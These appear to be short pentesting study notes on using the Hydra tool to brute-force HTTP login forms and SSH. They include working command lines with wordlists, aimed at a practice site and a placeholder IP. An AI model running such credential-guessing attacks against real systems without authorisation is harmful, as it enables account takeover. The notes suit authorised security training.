See how to use Hydra in:

🐉 HTTP authentication attack

🐉 SSH authentication attack

HTTP Login Form

verify how it works and what parameters it sends to the application for authentication → inspect source code

see names of parameter

for this example:

https://s3-us-west-2.amazonaws.com/secure.notion-static.com/a140b512-c0a0-490d-baae-482da89e43d6/Untitled.png

hydra
hydra -U http-post-form
hydra crackme.site http-post-form "/login.php:usr=^USER^&pwd=^PASS^:invalid credentials" -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-15.txt -f -V

SSH

hydra -U ssh
hydra <target IP> ssh -L /usr/share/ncrack/minimal.usr -P /usr/share/seclists/Passwords/rockyou-10.txt -f -V